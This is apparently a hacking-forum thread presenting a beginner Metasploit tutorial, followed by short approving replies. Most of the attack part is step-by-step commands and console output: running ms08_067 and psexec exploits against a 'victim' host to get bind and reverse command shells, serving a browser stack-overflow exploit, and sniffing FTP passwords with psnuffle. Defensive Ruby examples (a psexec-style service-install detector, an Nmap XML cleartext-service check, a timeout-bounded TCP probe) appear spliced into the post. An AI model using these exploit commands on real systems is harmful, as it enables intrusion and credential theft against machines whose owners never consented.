(share) Metasploit for beginners tutorial
#1
Hi everyone, I decided to share with you an easy Metasploit tutorial that is easier to understand. I wrote this tutorial personally; it is not copied. Let's start.

Metasploit Architecture

[Image: Msf_architecture_01.png]

Metasploit's filesystem is organized into directories:

data: "variable" files used by Metasploit
documentation: provides documentation for Metasploit
external: source code and independent "libraries"
lib: the "main" part of the base
config: Metasploit modules
plugins: accessories that can be loaded at run time in Metasploit
scripts: Meterpreter and other scripts

Modules and locations

Exploit
Defined as a module that uses a payload.
Exploit without a payload: auxiliary module.

Payload
A payload contains the code that is delivered to the "remote" side.

Encoder
An encoder ensures that the payload arrives at the desired location, i.e. it encodes it.

Locations of modules

The primary module "tree"
/opt/framework/msf3/modules/

User-specified module "tree"
~/.msf4/modules/

Loading an additional module "tree"
Use the -m option when you run the console (with metasploit)


Msfcli
msfcli provides a powerful command line interface to MSF
Code:
msfcli -h

We use this to get help on using msfcli.

Example
Code:
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.102 PAYLOAD=windows/shell/bind_tcp E

This runs the exploit windows/smb/ms08_067_netapi against the victim IP address 192.168.1.102 with the payload windows/shell/bind_tcp.
Then we get a command shell.

Msfconsole
[Image: Msfcon-00.png]
Msfconsole is the most popular MSF interface.

For help on using msfconsole.
Usage:
Code:
use exploit/windows/smb/ms08_067_netapi
set LHOST <your ip>
set RHOST <victim ip>
set PAYLOAD windows/shell/bind_tcp
exploit

By typing help in msfconsole you'll see all the commands.

Exploits

All exploits are divided into active and passive.
Active exploits run against a specific host until they "complete" and then shut down.
Passive exploits are those that wait for the victim's connection.

Code:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.102
RHOST => 192.168.1.102
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS infernal
SMBPASS => infernal
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.102[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.102[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.102:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

An example of a passive exploit
Code:
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.

[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.102:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.102:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.102:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

"Information Gathering"

One of these "applications" is the Dradis Framework.

For more info go to http://dradisframework.org/

Code:
root@Infernal:~# cd /pentest/misc/dradis/
root@Infernal:/pentest/misc/dradis# ./start.sh

Starting Dradis
When "adjusted", it can be used for the purposes of Information Gathering.
[Image: Dradis.png]

Port scanning

Code:
msf > nmap -v -sV 192.168.1.0/24 -oA file
[*] exec: nmap -v -sV 192.168.1.0/24 -oA file

Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 19:29 MDT
NSE: Loaded 3 scripts for scanning.
Initiating ARP Ping Scan at 19:29
Scanning 101 hosts [1 port/host]
...
Nmap done: 256 IP addresses (16 hosts up) scanned in 499.41 seconds
Raw packets sent: 19973 (877.822KB) | Rcvd: 15125 (609.512KB)

Then use the db_import command, which will automatically import nmap's file.

Code:
msf > db_import filel.xml
[*] Importing 'Nmap XML' data
[*] Importing host 192.168.1.1
[*] Importing host 192.168.1.2
[*] Importing host 192.168.1.11
[*] Importing host 192.168.1.100
[*] Importing host 192.168.1.101

Password Sniffing
One easy way is psnuffle:
Code:
msf > use auxiliary/sniffer/psnuffle

After that, run it with the run command.

Code:
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /opt/framework/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/framework/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/framework/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /opt/framework/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> user / pass (220 3Com 3CDaemon FTP Server Version 2.0)


Now we're going to write a simple TCP scanner that connects to port 4444 on the host. When it connects, it sends an "im alive" message and prints the reply along with the IP address.

Code:
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  # TCP client helpers (connect, sock, disconnect) and the RHOSTS loop
  # that calls run_host once per address.
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Infernaltcscanner',
      'Version'     => '1.0.0',
      'Description' => 'example scanner',
      'Author'      => 'Infernal92',
      'License'     => MSF_LICENSE
    )
    # Default target port; the user can override it with "set RPORT".
    register_options(
      [
        Opt::RPORT(4444)
      ], self.class)
  end

  # Called by the Scanner mixin for every host in RHOSTS.
  def run_host(ip)
    connect()
    hello = "im alive"
    sock.puts(hello)            # send the greeting
    data = sock.recv(1024)      # read up to 1024 bytes of reply
    print_status("Received: #{data} from #{ip}")
    disconnect()
  end
end

Use it like this
Code:
msf > use scanner/examplescanner.tcp
msf auxiliary(examplescanner.tcp) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(examplescanner) > run

[*] Received: Im alive from 192.168.1.100
[*] Auxiliary module execution completed

I hope I helped someone.
Tutorial by me :)
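The psexec transcript above is worth reading from the other side as well: on the target it leaves a remote logon, a binary written into the admin share (the "Created \hikmEeEM.exe" line), and a service with a random 8-letter name (the "Creating a new service (ciWyCVEp ...)" line) that is started and removed within seconds. The following is an added example, not part of the tutorial and not Metasploit code, showing how a defender could flag that pattern in Windows event data. The key=value log format, the host names and the allowlist are constructed for the example; only the event IDs (4624 logon, 5145 share access, 7045 service installed, 7036 service state change) are real Windows event IDs, and the "8 random letters" rule is a heuristic taken from the names in the transcript.

```ruby
require 'time'

# Constructed sample events in a simple key=value format (not a real Windows
# export). The service/binary names are the ones from the psexec transcript.
SAMPLE_EVENTS = [
  'ts=2012-08-11T08:37:01 host=WKSTN01 event_id=4624 logon_type=3 user=victim src_ip=192.168.1.5',
  'ts=2012-08-11T08:37:02 host=WKSTN01 event_id=5145 share=ADMIN$ relative_target=hikmEeEM.exe access=WriteData src_ip=192.168.1.5',
  'ts=2012-08-11T08:37:02 host=WKSTN01 event_id=7045 service_name=ciWyCVEp image_path=%SYSTEMROOT%\hikmEeEM.exe start_type=demand',
  'ts=2012-08-11T08:37:03 host=WKSTN01 event_id=7036 service_name=ciWyCVEp state=running',
  'ts=2012-08-11T08:40:00 host=WKSTN01 event_id=7045 service_name=Spooler image_path=%SYSTEMROOT%\System32\spoolsv.exe start_type=auto',
  'ts=2012-08-11T09:15:00 host=SRV02 event_id=7045 service_name=qWxKtLpZ image_path=%SYSTEMROOT%\Temp\kbjdLqEv.exe start_type=demand'
].freeze

# Heuristic from the transcript: the framework named its service with 8 random letters.
RANDOM_NAME = /\A[A-Za-z]{8}\z/
# Constructed allowlist of service names that are expected on these hosts.
ALLOWLIST = %w[Spooler wuauserv].freeze

# "k=v k=v ..." -> Hash of strings
def parse_event(line)
  line.split(' ').each_with_object({}) do |kv, ev|
    key, value = kv.split('=', 2)
    ev[key] = value
  end
end

# Last component of a Windows path, e.g. %SYSTEMROOT%\x.exe -> x.exe
def basename_win(path)
  path.to_s.split('\\').last
end

def suspicious_service_install?(ev)
  ev['event_id'] == '7045' &&
    RANDOM_NAME.match?(ev['service_name'].to_s) &&
    !ALLOWLIST.include?(ev['service_name'])
end

# For every suspicious 7045, collect reasons and correlate it with a write to
# the same binary over an admin share on the same host within +/- window seconds.
def find_psexec_style_installs(lines, window: 60)
  events = lines.map { |l| parse_event(l) }
  events.select { |ev| suspicious_service_install?(ev) }.map do |ev|
    t = Time.xmlschema(ev['ts'])
    exe = basename_win(ev['image_path'])
    reasons = ['service name looks randomly generated']
    reasons << 'binary lives outside System32' unless ev['image_path'] =~ /\\System32\\/i
    upload = events.find do |o|
      o['event_id'] == '5145' && o['host'] == ev['host'] &&
        o['relative_target'].to_s.casecmp?(exe) &&
        (t - Time.xmlschema(o['ts'])).abs <= window
    end
    reasons << "binary was written over #{upload['share']} from #{upload['src_ip']}" if upload
    { host: ev['host'], service: ev['service_name'], image: ev['image_path'],
      reasons: reasons, score: reasons.size }
  end
end

if __FILE__ == $0
  find_psexec_style_installs(SAMPLE_EVENTS).each do |f|
    puts "#{f[:host]} #{f[:service]} (#{f[:image]}) score=#{f[:score]}: #{f[:reasons].join('; ')}"
  end
end
```

The correlation with the 5145 write is what separates this from a noisy "any new service" alert: the WKSTN01 install scores three reasons and names the source address, the SRV02 install scores two and still deserves a look, and the Spooler entry is never considered.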
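The port scanning part runs nmap with -oA, and db_import then reads the .xml file nmap wrote. As an added example (my own code, not the tutorial's and not Metasploit's db_import), here is a small Ruby parser for that Nmap XML, using only REXML from the standard library, and a check that lists the open services psnuffle can sniff credentials from because they speak cleartext (FTP, telnet, POP3, IMAP, HTTP). The XML sample, its hosts and banners are constructed for the example and only follow the shape of real nmap output.

```ruby
require 'rexml/document'

# Constructed sample of the XML that `nmap -oA file` writes to file.xml.
# Hosts, ports and banners are made up for this example.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -v -sV 192.168.1.0/24 -oA file" version="5.00">
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="192.168.1.100" addrtype="ipv4"/>
      <address addr="00:11:22:33:44:55" addrtype="mac"/>
      <ports>
        <port protocol="tcp" portid="21">
          <state state="open" reason="syn-ack"/>
          <service name="ftp" product="3Com 3CDaemon ftpd" version="2.0"/>
        </port>
        <port protocol="tcp" portid="23">
          <state state="closed" reason="reset"/>
          <service name="telnet"/>
        </port>
        <port protocol="tcp" portid="445">
          <state state="open" reason="syn-ack"/>
          <service name="microsoft-ds"/>
        </port>
      </ports>
    </host>
    <host>
      <status state="down" reason="no-response"/>
      <address addr="192.168.1.101" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

Port = Struct.new(:proto, :number, :state, :service, :product, :version)
Host = Struct.new(:addr, :state, :ports)

# Walk nmaprun/host and collect address, up/down state and every port entry.
def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  hosts = []
  doc.elements.each('nmaprun/host') do |h|
    ipv4 = nil
    h.elements.each('address') do |a|
      ipv4 = a.attributes['addr'] if a.attributes['addrtype'] == 'ipv4'
    end
    status = h.elements['status']
    state = status ? status.attributes['state'] : 'unknown'
    ports = []
    h.elements.each('ports/port') do |p|
      svc = p.elements['service']
      ports << Port.new(
        p.attributes['protocol'],
        p.attributes['portid'].to_i,
        p.elements['state'].attributes['state'],
        svc ? svc.attributes['name'] : nil,
        svc ? svc.attributes['product'] : nil,
        svc ? svc.attributes['version'] : nil
      )
    end
    hosts << Host.new(ipv4, state, ports)
  end
  hosts
end

def open_ports(host)
  host.ports.select { |p| p.state == 'open' }
end

# Protocols psnuffle can harvest logins from because they are cleartext.
CLEARTEXT_SERVICES = %w[ftp telnet pop3 imap http].freeze

# "ip:port/proto service" for every open cleartext service in the scan
def cleartext_services(hosts)
  hosts.flat_map do |h|
    open_ports(h).select { |p| CLEARTEXT_SERVICES.include?(p.service) }
                 .map { |p| "#{h.addr}:#{p.number}/#{p.proto} #{p.service}" }
  end
end

if __FILE__ == $0
  hosts = parse_nmap_xml(SAMPLE_NMAP_XML)
  hosts.each { |h| puts "#{h.addr} (#{h.state}): open #{open_ports(h).map(&:number).join(', ')}" }
  puts "Cleartext services: #{cleartext_services(hosts).inspect}"
end
```

Point it at a real file.xml with parse_nmap_xml(File.read('file.xml')) and the cleartext list is the set of services whose passwords would show up in a psnuffle run, which is the list to migrate to FTPS/SSH/TLS first.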
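The auxiliary module at the end of the tutorial relies on the framework for two things it never shows: the RHOSTS loop that calls run_host per address, and the socket plumbing behind connect/sock/disconnect. As an added example (mine, not the tutorial's module and not framework code), the same probe is written with plain Ruby sockets so it can be run without Metasploit, plus the part the module leaves out: a bounded connect and read timeout, so a host that accepts the connection and never answers cannot hang the whole scan. A tiny local "alive" service is started on an ephemeral port so the example runs offline; its reply text is constructed.

```ruby
require 'socket'
require 'io/wait'

# One host, one port: connect, send the hello, wait (bounded) for a reply.
# Returns the reply, or nil when the port is closed/filtered or the service
# never answers within the timeout.
def probe_host(ip, port, hello: 'im alive', timeout: 2)
  Socket.tcp(ip, port, connect_timeout: timeout) do |sock|
    sock.write("#{hello}\n")
    return nil unless sock.wait_readable(timeout)   # nil on read timeout
    sock.readpartial(1024).chomp
  end
rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, Errno::EHOSTUNREACH,
       Errno::ENETUNREACH, EOFError, IOError
  nil
end

# What the Scanner mixin does behind run_host: probe every address in turn.
def scan_hosts(ips, port, **opts)
  ips.each_with_object({}) { |ip, results| results[ip] = probe_host(ip, port, **opts) }
end

# Stand-in for the "alive" service on port 4444 so the example runs offline:
# listens on an ephemeral localhost port and answers every hello line.
def start_alive_service(reply: 'im alive too')
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  thread = Thread.new do
    loop do
      client = server.accept
      client.gets            # consume the scanner's hello
      client.puts(reply)
      client.close
    end
  end
  [port, server, thread]
end

# A localhost port with nothing listening, to exercise the failure path.
def closed_port
  s = TCPServer.new('127.0.0.1', 0)
  port = s.addr[1]
  s.close
  port
end

if __FILE__ == $0
  port, server, thread = start_alive_service
  puts scan_hosts(['127.0.0.1'], port).inspect           # {"127.0.0.1"=>"im alive too"}
  puts probe_host('127.0.0.1', closed_port).inspect      # nil: connection refused
  thread.kill
  server.close
end
```

In the framework version the equivalent of the timeout is the ConnectTimeout option the Tcp mixin registers; the point of the plain version is that the read after connect needs a bound too, which sock.recv(1024) in the module does not give you.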
(08-11-2012, 08:37 AM)Infernal92 Wrote: Hi everyone I decided to share with you an easy tutorial for metasploit easier to understand how to use.This tutorial personally i written is not copied.Let's start
#2
Yeaaah it's cool bro :) welcome to our forum

#3
Great, I see there's Dradis too.
Personally I never use it, I'm too lazy :D

+1 from me :)

#4
(08-11-2012, 08:53 AM)konspirasi Wrote: Great, I see there's Dradis too.
Personally I never use it, I'm too lazy :D

+1 from me :)

Thanks :)

#5
That's a great tutorial and concept :), keep sharing.
Everyone has a superiority that you don't know..





